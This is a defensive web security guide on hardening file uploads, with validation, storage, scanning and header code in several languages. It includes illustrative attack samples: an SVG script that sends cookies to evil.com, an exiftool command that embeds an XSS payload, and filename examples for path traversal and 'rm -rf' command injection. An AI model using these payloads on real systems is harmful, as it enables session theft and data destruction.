jan-karel.com

File Upload Hardening

Building Securely Without Delay

Web risk is rarely mysterious. It usually lies in predictable mistakes that persist under time pressure.

In File Upload Hardening you reduce risk with type checking, isolation, scanning, and restricted execution permissions.

This turns security from a loose afterthought into a standard quality attribute of your product.

Immediate measures (15 minutes)

Why this matters

File upload hardening is about reducing risk in practice. The technical background below explains why each measure exists, but what counts is that the measures are actually implemented and embedded in how you build and deploy.

Why file uploads are dangerous

An unsecured file upload opens the door to virtually every attack category:

| Attack | Mechanism | Impact |
|---|---|---|
| Malware distribution | Server is used to host and distribute malware | Reputational damage, legal liability |
| Path traversal | Filename contains ../../ to write outside the upload directory | Overwriting configuration files, RCE |
| Denial of Service | Extremely large files or enormous numbers of uploads | Disk space exhausted, service unavailable |
| Stored XSS via SVG | SVG file with embedded <script> tags | Session theft, account takeover |
| Stored XSS via HTML | HTML file with JavaScript, served with text/html | Session theft, phishing |
| EXIF data injection | Metadata in images contains payloads | XSS, SQL injection via metadata parsing |
| XML External Entity | Files with XML structure (SVG, DOCX, XLSX) contain XXE payloads | SSRF, file disclosure |
| Polyglot files | File is simultaneously a valid JPEG and a valid PHP script | Bypass of validation, RCE |

The key question is not whether your upload functionality is vulnerable, but how many layers of defense you have put in place before an attacker reaches the crown jewels.

File type validation

Extension allowlist

Always use an allowlist of permitted extensions, never a blocklist. A blocklist is by definition incomplete: you block .php but forget .phtml, .pht, .php5, .phar, or .shtml.

# Python - extension allowlist
import os

ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx'}

def allowed_file(filename: str) -> bool:
    # Only the final extension is checked: 'shell.php.jpg' yields '.jpg'
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS

// Node.js - extension allowlist
const path = require('path');

const ALLOWED_EXTENSIONS = new Set(['.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx']);

function allowedFile(filename) {
  const ext = path.extname(filename).toLowerCase();
  return ALLOWED_EXTENSIONS.has(ext);
}

MIME type validation

The Content-Type header is set by the client and is therefore fundamentally unreliable. An attacker can upload a PHP webshell with Content-Type: image/jpeg. Verify the MIME type server-side based on the file contents:

# Python - server-side MIME detection with python-magic
import magic

def validate_mime(filepath: str, allowed_mimes: set) -> bool:
    mime = magic.from_file(filepath, mime=True)
    return mime in allowed_mimes

ALLOWED_MIMES = {'image/jpeg', 'image/png', 'image/gif', 'application/pdf'}

// Node.js - MIME detection with file-type (works on magic bytes)
import { fileTypeFromFile } from 'file-type';

async function validateMime(filepath, allowedMimes) {
  const result = await fileTypeFromFile(filepath);
  if (!result) return false;
  return allowedMimes.has(result.mime);
}

// PHP - finfo for MIME detection
function validateMime(string $filepath, array $allowedMimes): bool {
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($filepath);
    return in_array($mime, $allowedMimes, true);
}

Magic bytes validation

Magic bytes (file signatures) are the first bytes of a file that identify the format. This is more reliable than extensions or Content-Type headers, but not watertight: polyglot files can have valid magic bytes and still contain malicious code.

| File type | Magic bytes (hex) | Extension | MIME type |
|---|---|---|---|
| JPEG | FF D8 FF | .jpg, .jpeg | image/jpeg |
| PNG | 89 50 4E 47 0D 0A 1A 0A | .png | image/png |
| GIF87a | 47 49 46 38 37 61 | .gif | image/gif |
| GIF89a | 47 49 46 38 39 61 | .gif | image/gif |
| PDF | 25 50 44 46 2D | .pdf | application/pdf |
| ZIP (DOCX/XLSX) | 50 4B 03 04 | .zip, .docx, .xlsx | application/zip |
| RIFF (WebP) | 52 49 46 46 ("RIFF"), then 57 45 42 50 ("WEBP") at offset 8 | .webp | image/webp |
| SVG | 3C 3F 78 6D 6C ("<?xml") or 3C 73 76 67 ("<svg"); text format, no fixed signature | .svg | image/svg+xml |

# Python - magic bytes validation
MAGIC_BYTES = {
    b'\xff\xd8\xff': 'image/jpeg',
    b'\x89PNG\r\n\x1a\n': 'image/png',
    b'GIF87a': 'image/gif',
    b'GIF89a': 'image/gif',
    b'%PDF-': 'application/pdf',
}

def check_magic_bytes(filepath: str) -> str | None:
    with open(filepath, 'rb') as f:
        header = f.read(8)
    for magic, mime in MAGIC_BYTES.items():
        if header.startswith(magic):
            return mime
    return None
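
RIFF is a generic container that WAV and AVI files also use, so the four-byte prefix alone does not identify WebP. The following is a minimal sketch of a stricter check; `is_webp` is a hypothetical helper, not part of the code above, and it needs the first 12 bytes rather than the 8 that `check_magic_bytes` reads.

```python
def is_webp(header: bytes) -> bool:
    """Return True if the header looks like RIFF with a WEBP form type."""
    # Bytes 0-3: 'RIFF', bytes 4-7: little-endian chunk size, bytes 8-11: form type
    return len(header) >= 12 and header[:4] == b'RIFF' and header[8:12] == b'WEBP'
```

A WAV file starts with the same four bytes but carries `WAVE` at offset 8, so it is rejected by this check.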

Combined validation

Never rely on a single layer. Combine all three methods:

def validate_upload(filename: str, filepath: str) -> bool:
    # Layer 1: extension
    if not allowed_file(filename):
        return False
    # Layer 2: magic bytes
    detected_type = check_magic_bytes(filepath)
    if detected_type not in ALLOWED_MIMES:
        return False
    # Layer 3: server-side MIME
    if not validate_mime(filepath, ALLOWED_MIMES):
        return False
    return True
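
The three layers above each check the file against the allowlist, but none of them checks that the layers agree with each other: a PDF named `photo.png` passes all three. Note also that, with the sets as shown, `.docx` passes the extension check but can never pass the other two layers, because no ZIP-based type appears in `ALLOWED_MIMES`. A possible fourth layer, sketched here with a hypothetical `EXTENSION_TO_MIME` mapping that you would adapt to your own allowlist:

```python
import os
from typing import Optional

# Hypothetical mapping from allowed extension to the one MIME type it may carry
EXTENSION_TO_MIME = {
    '.jpg': 'image/jpeg',
    '.jpeg': 'image/jpeg',
    '.png': 'image/png',
    '.gif': 'image/gif',
    '.pdf': 'application/pdf',
}

def extension_matches_content(filename: str, detected_mime: Optional[str]) -> bool:
    """Return True only if the detected type is the one expected for the extension."""
    ext = os.path.splitext(filename)[1].lower()
    expected = EXTENSION_TO_MIME.get(ext)
    # Unknown extensions and undetected types both fail closed
    return expected is not None and expected == detected_mime
```

Called with the result of `check_magic_bytes(filepath)`, this rejects files whose name and content disagree.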

Filename sanitization

The original filename of an upload is user input and must be treated as such. Never trust it.

Dangerous filenames

| Attack technique | Example | Risk |
|---|---|---|
| Path traversal | ../../../etc/cron.d/backdoor | Overwriting files outside upload dir |
| Null byte injection | shell.php%00.jpg | Old parsers see .jpg, server executes .php |
| Double extension | document.php.jpg | Depending on server configuration: execution as PHP |
| Unicode tricks | image\u202E\u0067np.php (right-to-left override) | Filename appears as imagephp.png in UI |
| Overlength name | A x 10000 + .jpg | Buffer overflows, filesystem errors |
| Special characters | ; rm -rf / ;.jpg | Command injection with unsafe processing |
| Windows reserved | CON.jpg, NUL.png, AUX.pdf | System errors on Windows servers |
| Dots and spaces | "shell.php." or "shell.php " (trailing dot or space) | Windows strips trailing dots/spaces: becomes shell.php |
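
If you want to log or reject suspicious names before renaming, the patterns in the table can be detected with a few string checks. This is a rough sketch, not a complete filter; `filename_problems`, the reserved-name set, and the 255-character limit are illustrative assumptions.

```python
import unicodedata
from typing import List

# Assumption: the classic Windows device names; the list may not be exhaustive
WINDOWS_RESERVED = (
    {'CON', 'PRN', 'AUX', 'NUL'}
    | {f'COM{i}' for i in range(1, 10)}
    | {f'LPT{i}' for i in range(1, 10)}
)
MAX_NAME_LENGTH = 255  # assumption: a common filesystem limit

def filename_problems(name: str) -> List[str]:
    """Return a list of suspicious traits found in a client-supplied filename."""
    problems = []
    if '/' in name or '\\' in name or '..' in name:
        problems.append('path separator or ..')
    if '\x00' in name:
        problems.append('null byte')
    # Cc = control characters, Cf = format characters such as U+202E
    if any(unicodedata.category(ch) in ('Cc', 'Cf') for ch in name):
        problems.append('control or format character')
    if len(name) > MAX_NAME_LENGTH:
        problems.append('overlength')
    if name != name.rstrip('. '):
        problems.append('trailing dot or space')
    if name.split('.')[0].upper() in WINDOWS_RESERVED:
        problems.append('windows reserved name')
    if len([part for part in name.split('.') if part]) > 2:
        problems.append('multiple extensions')
    return problems
```

An empty list does not make a name safe to use on disk; it only means none of these specific patterns matched.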

Safe approach: renaming

The safest strategy is to completely ignore the original filename and assign a UUID:

import uuid
import os

def safe_filename(original_filename: str) -> str:
    ext = os.path.splitext(original_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"Extension not allowed: {ext}")
    return f"{uuid.uuid4().hex}{ext}"

// Node.js
const { randomUUID } = require('crypto');
const path = require('path');

function safeFilename(originalFilename) {
  const ext = path.extname(originalFilename).toLowerCase();
  if (!ALLOWED_EXTENSIONS.has(ext)) {
    throw new Error(`Extension not allowed: ${ext}`);
  }
  return `${randomUUID().replace(/-/g, '')}${ext}`;
}

If you want to preserve the original name (for example for user-friendliness), store it in the database but use the UUID on the filesystem:

# Database: preserve original name, UUID on disk
upload = Upload(
    original_name=secure_filename(file.filename),
    stored_name=safe_filename(file.filename),
    uploaded_by=current_user.id
)

os.path.basename() is not enough

os.path.basename() prevents path traversal but does not protect against double extensions, null bytes, or Unicode tricks. Use it as an additional layer, not as the sole defense:

# Minimum: basename + Werkzeug secure_filename
from werkzeug.utils import secure_filename

name = secure_filename(os.path.basename(uploaded_name))
# Better: UUID + store original name in database

Storage hardening

Store outside the webroot

Rule number one: never store uploads in a directory that is directly served by the web server. If an attacker uploads a webshell to /var/www/html/uploads/, they can call it directly via the browser.

# Wrong: inside webroot
/var/www/html/
  ├── index.php
  └── uploads/        <-- directly accessible via http://site/uploads/
      └── shell.php   <-- http://site/uploads/shell.php = RCE

# Correct: outside webroot
/var/www/html/
  └── index.php
/srv/uploads/          <-- not directly accessible via HTTP
  └── a3f8b2c1.jpg

Serve uploads via an application route that enforces access control and content-type headers:

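# Flask - serve uploads via application
# Assumes Flask-Login and the uploaded_by column from the Upload model above
from flask import abort, send_from_directory
from flask_login import current_user, login_required

@app.route('/files/<file_id>')
@login_required
def serve_file(file_id):
    upload = Upload.query.get_or_404(file_id)
    # Being logged in is not enough: check that this user may read this file
    if upload.uploaded_by != current_user.id:
        abort(403)
    return send_from_directory(
        app.config['UPLOAD_FOLDER'],
        upload.stored_name,
        mimetype=upload.detected_mime,  # No text/html!
        as_attachment=True
    )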
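
Flask's `send_from_directory` refuses paths that escape the given directory. If your own code opens stored files directly (for scanning or re-encoding, for example), a similar containment check is worth adding. A minimal sketch, where `resolve_inside` is a hypothetical helper:

```python
from pathlib import Path

def resolve_inside(base_dir: str, stored_name: str) -> Path:
    """Resolve stored_name under base_dir, raising ValueError if it escapes."""
    base = Path(base_dir).resolve()
    # resolve() collapses '..' segments and follows symlinks
    candidate = (base / stored_name).resolve()
    if base not in candidate.parents:
        raise ValueError(f"Path escapes upload directory: {stored_name!r}")
    return candidate
```

Absolute names such as `/etc/passwd` are rejected too, because joining them onto the base replaces the base entirely.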

Dedicated storage service

Preferably use object storage (S3, GCS, Azure Blob) with pre-signed URLs:

# AWS S3 - pre-signed upload URL
import boto3

s3 = boto3.client('s3')

def generate_upload_url(bucket: str, key: str, expires: int = 300) -> str:
    return s3.generate_presigned_url(
        'put_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ContentType': 'image/jpeg',
        },
        ExpiresIn=expires
    )

# Pre-signed download URL
def generate_download_url(bucket: str, key: str, expires: int = 3600) -> str:
    return s3.generate_presigned_url(
        'get_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ResponseContentDisposition': 'attachment',
        },
        ExpiresIn=expires
    )
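
A pre-signed PUT URL like the one above fixes the content type but cannot cap the upload size. Pre-signed POST policies can, through a `content-length-range` condition. The sketch below uses boto3's `generate_presigned_post`; the helper names and the 10 MB default are assumptions for illustration.

```python
def build_post_policy(content_type: str, max_bytes: int) -> dict:
    """Build the Fields and Conditions for a size-limited pre-signed POST."""
    return {
        'Fields': {'Content-Type': content_type},
        'Conditions': [
            {'Content-Type': content_type},           # client must send exactly this type
            ['content-length-range', 1, max_bytes],   # reject empty and oversized bodies
        ],
    }

def generate_upload_form(bucket: str, key: str, content_type: str = 'image/jpeg',
                         max_bytes: int = 10 * 1024 * 1024, expires: int = 300) -> dict:
    """Return the URL and form fields the browser needs for a direct upload."""
    import boto3  # imported here so the policy builder works without AWS libraries
    policy = build_post_policy(content_type, max_bytes)
    return boto3.client('s3').generate_presigned_post(
        Bucket=bucket,
        Key=key,
        Fields=policy['Fields'],
        Conditions=policy['Conditions'],
        ExpiresIn=expires,
    )
```

Files uploaded this way bypass your application entirely, so validation and scanning still have to run afterwards, before the object is made available to other users.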

No execute permissions

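Ensure that uploaded files never carry an execute bit. The directory itself keeps its x bit, because on a directory that bit only permits traversal, not execution:

# Filesystem permissions
chown www-data:www-data /srv/uploads
chmod 750 /srv/uploads
# No execute bit on files (find also covers subdirectories and very large directories)
find /srv/uploads -type f -exec chmod 640 {} +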
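
Rather than fixing permissions after the fact, the application can create each file with the right mode from the start. A minimal sketch for POSIX systems; `write_upload` is a hypothetical helper:

```python
import os

def write_upload(path: str, data: bytes, mode: int = 0o640) -> None:
    """Create a new file without execute bits; fail if the path already exists."""
    # O_EXCL makes creation fail instead of overwriting an existing file
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL
    fd = os.open(path, flags, mode)
    with os.fdopen(fd, 'wb') as f:
        f.write(data)
```

The process umask can only remove bits from the requested mode, so the result is never more permissive than 640.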

Nginx: block execution in upload directory

# nginx - block script execution in upload location
location /uploads/ {
    # Force download, never execute
    add_header Content-Disposition "attachment" always;
    add_header X-Content-Type-Options "nosniff" always;

    # Explicitly block all script extensions
    location ~* \.(php|phtml|php5|phar|pl|py|cgi|asp|aspx|jsp|sh|bash)$ {
        deny all;
        return 403;
    }

    # No directory listing
    autoindex off;
}

Separate domain for user content

Serve user-generated content from a separate domain to leverage cookie scope and same-origin policy as a defense layer:

# Main application
app.example.com          -> session cookies, CSRF tokens

# User content (separate domain, no cookies from main app)
content.example.com      -> uploads, profile images

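If an attacker achieves XSS via an uploaded SVG file on content.example.com, they have no access to cookies from app.example.com, provided those cookies are host-only (set without a Domain=example.com attribute). A completely separate registrable domain for user content gives stronger isolation than a subdomain.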

Size and quantity limits

Without limits, your upload endpoint is an invitation for Denial of Service.

Server configuration

# nginx - maximum body size
http {
    client_max_body_size 10m;    # Global: max 10 MB
    client_body_timeout 30s;     # Timeout for receiving body
    client_body_buffer_size 128k;
}

# Per location override
location /api/upload {
    client_max_body_size 25m;    # Specific endpoint: max 25 MB
}

# Apache - maximum request body in bytes (10 MB)
LimitRequestBody 10485760

Application limits

# Flask - file size limit
from flask import jsonify

app.config['MAX_CONTENT_LENGTH'] = 10 * 1024 * 1024  # 10 MB

@app.errorhandler(413)
def too_large(e):
    return jsonify(error="File too large (max 10 MB)"), 413

// Express + multer - file size and quantity limits
const multer = require('multer');
const path = require('path');

const upload = multer({
  dest: '/srv/uploads/',
  limits: {
    fileSize: 10 * 1024 * 1024,  // 10 MB per file
    files: 5,                     // Max 5 files per request
    fields: 10,                   // Max 10 form fields
  },
  fileFilter: (req, file, cb) => {
    const allowed = ['.jpg', '.jpeg', '.png', '.gif', '.pdf'];
    const ext = path.extname(file.originalname).toLowerCase();
    cb(null, allowed.includes(ext));
  }
});

app.post('/upload', upload.array('files', 5), (req, res) => {
  res.json({ uploaded: req.files.length });
});
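
Where your own code reads an upload stream (for example when proxying to object storage), the declared size cannot be trusted, so count bytes while copying and abort once the limit is exceeded. A minimal sketch; `copy_with_limit` and `UploadTooLarge` are hypothetical names:

```python
import io
from typing import BinaryIO

class UploadTooLarge(Exception):
    """Raised when a stream exceeds the configured size limit."""

def copy_with_limit(src: BinaryIO, dst: BinaryIO, max_bytes: int,
                    chunk_size: int = 64 * 1024) -> int:
    """Copy src to dst in chunks; raise UploadTooLarge past max_bytes."""
    total = 0
    while True:
        chunk = src.read(chunk_size)
        if not chunk:
            return total
        total += len(chunk)
        if total > max_bytes:
            # Stop before writing the chunk that crosses the limit
            raise UploadTooLarge(f"Upload exceeds {max_bytes} bytes")
        dst.write(chunk)
```

On `UploadTooLarge`, the caller should delete the partially written destination file.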

Rate limiting

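# Flask-Limiter - limit uploads per time unit
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

# Flask-Limiter 3.x takes key_func first; older releases used Limiter(app, key_func=...)
limiter = Limiter(get_remote_address, app=app)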

@app.route('/upload', methods=['POST'])
@limiter.limit("10/hour")          # Max 10 uploads per hour per IP
@limiter.limit("3/minute")         # Max 3 per minute
def upload_file():
    ...
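
To show what such a limit does under the hood, here is a small in-memory sliding-window limiter. It is a sketch for a single process only; the class name is hypothetical, and a real deployment would normally rely on Flask-Limiter with a shared storage backend. The key can be an IP address or, for authenticated endpoints, a user ID.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict

class SlidingWindowLimiter:
    """Allow at most max_events per key within the last window_seconds."""

    def __init__(self, max_events: int, window_seconds: float,
                 clock: Callable[[], float] = time.monotonic):
        self.max_events = max_events
        self.window = window_seconds
        self.clock = clock
        self._events: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, key: str) -> bool:
        now = self.clock()
        events = self._events[key]
        # Drop timestamps that have fallen out of the window
        while events and now - events[0] >= self.window:
            events.popleft()
        if len(events) >= self.max_events:
            return False
        events.append(now)
        return True
```

The injectable `clock` exists only to make the behavior easy to test without sleeping.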

Antivirus scanning

Scan every uploaded file for malware before it is stored or made available.

ClamAV integration

# Install ClamAV and start daemon
sudo apt install clamav clamav-daemon
sudo freshclam                     # Signature update
sudo systemctl start clamav-daemon

# Python - scanning with pyclamd
import os
import shutil

import pyclamd
from flask import jsonify, request

class VirusScanner:
    def __init__(self):
        self.cd = pyclamd.ClamdUnixSocket('/var/run/clamav/clamd.ctl')
        if not self.cd.ping():
            raise RuntimeError("ClamAV daemon not reachable")

    def scan_file(self, filepath: str) -> tuple[bool, str | None]:
        """Returns (is_clean, threat_name)."""
        result = self.cd.scan_file(filepath)
        if result is None:
            return True, None
        # result = {'/path/to/file': ('FOUND', 'Eicar-Test-Signature')}
        status, threat = list(result.values())[0]
        return False, threat

# Usage in upload handler
scanner = VirusScanner()

@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    temp_path = os.path.join('/tmp', safe_filename(file.filename))
    file.save(temp_path)

    is_clean, threat = scanner.scan_file(temp_path)
    if not is_clean:
        os.remove(temp_path)
        app.logger.warning(f"Malware detected: {threat}")
        return jsonify(error="File rejected by virus scanner"), 400

    # File is clean, move to permanent storage
    final_path = os.path.join(app.config['UPLOAD_FOLDER'], os.path.basename(temp_path))
    shutil.move(temp_path, final_path)
    return jsonify(status="ok"), 201

Note: antivirus scanning is an additional layer, not a replacement for file type validation. AV scanners miss zero-day payloads and custom malware.
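
The scanner class above treats every non-None result as a detection. It can help to separate "infected" from "scanner error" for logging and alerting, while still rejecting the file in both cases. The sketch below assumes that scanner failures arrive as an `('ERROR', reason)` tuple in the same dict shape as the `FOUND` example; verify that against the pyclamd version you use. The function names are hypothetical.

```python
from typing import Optional, Tuple

def classify_scan_result(result: Optional[dict]) -> Tuple[str, Optional[str]]:
    """Map a scan result to ('clean' | 'infected' | 'error', detail)."""
    if result is None:
        return 'clean', None
    status, detail = next(iter(result.values()))
    if status == 'FOUND':
        return 'infected', detail
    # Anything else (assumed: 'ERROR') means the file was not actually scanned
    return 'error', detail

def should_accept(result: Optional[dict]) -> bool:
    """Fail closed: only an explicit clean result lets the file through."""
    return classify_scan_result(result)[0] == 'clean'
```

Failing closed matters here: if the daemon is down or cannot read the file, accepting the upload would silently disable the scanning layer.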

Image-specific risks

SVG with embedded JavaScript

SVG is XML and can contain arbitrary JavaScript:

<!-- Malicious SVG -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>document.location='https://evil.com/?c='+document.cookie</script>
  <rect width="100" height="100" fill="red"/>
</svg>

Defense: never serve SVG with Content-Type: image/svg+xml if it is user-uploaded content. Use Content-Disposition: attachment or convert to a raster format.
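
One way to apply this consistently is to derive the response headers from an allowlist of types that may keep their real Content-Type, and to downgrade everything else to a generic binary download. A minimal sketch; `PASSTHROUGH_MIMES` and `download_headers` are hypothetical names, and `stored_name` is assumed to be the UUID-based name, so it contains no quotes or control characters.

```python
# Assumption: only these types are served with their detected Content-Type
PASSTHROUGH_MIMES = {'image/jpeg', 'image/png', 'image/gif', 'application/pdf'}

def download_headers(detected_mime: str, stored_name: str) -> dict:
    """Build response headers that force a download and block MIME sniffing."""
    if detected_mime in PASSTHROUGH_MIMES:
        content_type = detected_mime
    else:
        # SVG, HTML, and anything unknown is never served as an active type
        content_type = 'application/octet-stream'
    return {
        'Content-Type': content_type,
        'Content-Disposition': f'attachment; filename="{stored_name}"',
        'X-Content-Type-Options': 'nosniff',
    }
```

With these headers an uploaded SVG is offered as a file download and is not rendered in the origin of the serving domain.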

EXIF data with payloads

EXIF metadata in JPEG files can contain XSS payloads or SQL injection strings that are triggered when the application parses metadata and displays it without encoding:

# Payload in EXIF Comment field
exiftool -Comment='<script>alert(document.cookie)</script>' photo.jpg
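
If the application does need to show or store metadata, treat each field like any other user input: encode it on output and bind it as a parameter in queries. A minimal sketch using only the standard library; the `upload_metadata` table and both function names are hypothetical.

```python
import html
import sqlite3

def metadata_cell(value: str) -> str:
    """Render a metadata value as an HTML table cell with output encoding."""
    return f'<td>{html.escape(value)}</td>'

def store_comment(conn: sqlite3.Connection, upload_id: str, comment: str) -> None:
    """Store a metadata value using bound parameters, never string formatting."""
    conn.execute(
        'INSERT INTO upload_metadata (upload_id, comment) VALUES (?, ?)',
        (upload_id, comment),
    )
```

The payload from the exiftool example is then displayed as literal text and stored as plain data.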

Image re-encoding as defense

By re-encoding images you remove embedded scripts, EXIF data, and polyglot constructs:

# Python - strip EXIF and re-encode with Pillow
from PIL import Image

def sanitize_image(input_path: str, output_path: str, max_size: tuple = (4096, 4096)):
    """Re-encode image: strips EXIF, removes embedded content."""
    with Image.open(input_path) as img:
        # Verify that it is actually an image
        img.verify()

    # Reopen after verify (verify makes object unusable)
    with Image.open(input_path) as img:
        # Convert to RGB (removes alpha-channel tricks)
        if img.mode not in ('RGB', 'L'):
            img = img.convert('RGB')

        # Limit dimensions
        img.thumbnail(max_size, Image.LANCZOS)

        # Save without EXIF data
        img.save(output_path, format='JPEG', quality=85, exif=b'')

// Node.js - re-encode with sharp
const sharp = require('sharp');

async function sanitizeImage(inputPath, outputPath) {
  await sharp(inputPath)
    .rotate()                    // Auto-rotate based on EXIF, then strip
    .resize(4096, 4096, {
      fit: 'inside',
      withoutEnlargement: true
    })
    .removeAlpha()
    .jpeg({ quality: 85 })
    .toFile(outputPath);
}
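
Both examples limit the output dimensions, but only after the image has been decoded. A small file can declare enormous dimensions, so it can be useful to read the declared size from the header first and reject the file before decoding. The sketch below does this for PNG only, using the fixed position of the IHDR chunk; the function names and the pixel budget are assumptions.

```python
import struct
from typing import Optional, Tuple

PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'

def png_dimensions(header: bytes) -> Optional[Tuple[int, int]]:
    """Read (width, height) from the first 24 bytes of a PNG, or None if invalid."""
    # Layout: 8-byte signature, 4-byte chunk length, 'IHDR', then width and height
    if len(header) < 24 or header[:8] != PNG_SIGNATURE or header[12:16] != b'IHDR':
        return None
    width, height = struct.unpack('>II', header[16:24])
    return width, height

def within_pixel_budget(header: bytes, max_pixels: int = 4096 * 4096) -> bool:
    """Return True only for a valid PNG header whose pixel count fits the budget."""
    dims = png_dimensions(header)
    return dims is not None and 0 < dims[0] * dims[1] <= max_pixels
```

This is a pre-filter, not a replacement for the re-encoding step: the declared size still has to be confirmed by the decoder.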

Content-Security-Policy for uploads

Add a strict CSP to responses for user-uploaded content:

@app.after_request
def add_upload_csp(response):
    if request.path.startswith('/files/'):
        response.headers['Content-Security-Policy'] = (
            "default-src 'none'; "
            "style-src 'none'; "
            "script-src 'none'; "
            "object-src 'none'"
        )
        response.headers['X-Content-Type-Options'] = 'nosniff'
    return response

It is always a delight to see how applications handle file uploads. "The user can upload a profile photo here," says the product owner, with full confidence that users will obediently pick a 200x200 JPEG. Meanwhile you have just built a direct pipeline from the public internet to your server's filesystem, protected by exactly zero layers of validation and an extension blocklist that contains .exe and .bat but forgot .php. Because yes, who uploads a PHP file as a profile photo? Only everyone who wants to take over your application. But no worries -- the Content-Type header says image/jpeg, so it must be safe. That header is after all set by... the attacker. The same type of logic as a nightclub that asks visitors to write their own age on a note. "He wrote 21, let him through." And to top it all off we store everything nicely in /var/www/html/uploads/, directly accessible and executable via the browser, because that saves us configuring a proxy route. Security by convenience.

Common mistakes

| # | Mistake | Why it is dangerous | Solution |
|---|---|---|---|
| 1 | Extension check only | Trivially bypassed by renaming | Combine with magic bytes and MIME detection |
| 2 | Blocklist instead of allowlist | You always forget an extension (.phtml, .phar, .shtml) | Use a strict allowlist |
| 3 | Trusting the Content-Type header | Set by the client, fully manipulable | Server-side detection with libmagic/file-type |
| 4 | Storage in webroot | Direct execution of uploaded script | Store outside webroot, serve via application |
| 5 | Keeping the original filename | Path traversal, double extensions, Unicode tricks | UUID renaming, original name in database |
| 6 | No size limit | DoS through large uploads | Configure max on web server and application |
| 7 | No rate limiting | Brute force upload, disk space exhaustion | Limit per IP per time unit |
| 8 | Allowing SVG without sanitization | Embedded JavaScript, XSS | Block SVG or convert to raster |
| 9 | Passing EXIF data to frontend | XSS via metadata fields | Strip EXIF, re-encode images |
| 10 | No antivirus scanning | Malware distribution via your platform | Integrate ClamAV or similar scanner |
| 11 | No Content-Disposition header | Browser renders file instead of downloading | Always attachment for user content |
| 12 | Same domain for app and uploads | XSS in upload has access to session cookies | Use a separate content domain |

Checklist

| Priority | Measure | Implementation |
|---|---|---|
| CRITICAL | Extension allowlist | Code: only accept explicitly permitted extensions |
| CRITICAL | Magic bytes validation | Code: python-magic, file-type, finfo |
| CRITICAL | Storage outside webroot | Infrastructure: separate directory, serve via app route |
| CRITICAL | Filename sanitization | Code: UUID renaming, original name in database |
| HIGH | Size limits | Web server: client_max_body_size; App: MAX_CONTENT_LENGTH |
| HIGH | Remove execute permissions | Infrastructure: chmod, nginx location block |
| HIGH | Content-Disposition header | Code/web server: attachment for all user uploads |
| HIGH | X-Content-Type-Options: nosniff | Code/web server: prevent MIME sniffing by browser |
| HIGH | Image re-encoding | Code: Pillow/sharp to strip EXIF and re-encode |
| MEDIUM | Antivirus scanning | Infrastructure: ClamAV daemon + pyclamd integration |
| MEDIUM | Rate limiting | Code: Flask-Limiter, express-rate-limit |
| MEDIUM | Separate content domain | Infrastructure: content.example.com for user uploads |
| MEDIUM | CSP on upload responses | Code: strict Content-Security-Policy header |
| LOW | Pre-signed URLs (S3/GCS) | Infrastructure: object storage with temporary URLs |
| LOW | SVG-to-raster conversion | Code: Pillow/sharp/Inkscape for SVG sanitization |

Summary: File upload hardening requires a defense-in-depth strategy. No single measure is sufficient on its own: an allowlist on extensions is bypassed by polyglot files, magic bytes validation misses custom payloads, and antivirus scanning does not catch zero-days. Strict file type validation (extension + magic bytes + MIME), filename sanitization (UUID renaming), secure storage (outside webroot, without execute permissions, separate domain), size and rate limits, antivirus scanning, and image re-encoding together form a robust defense. Treat every upload as potentially malicious, because it is, until proven otherwise.

In the next chapter we cover OAuth 2.0 and OpenID Connect -- how to securely delegate authentication and authorization to identity providers, and which mistakes you absolutely must avoid.
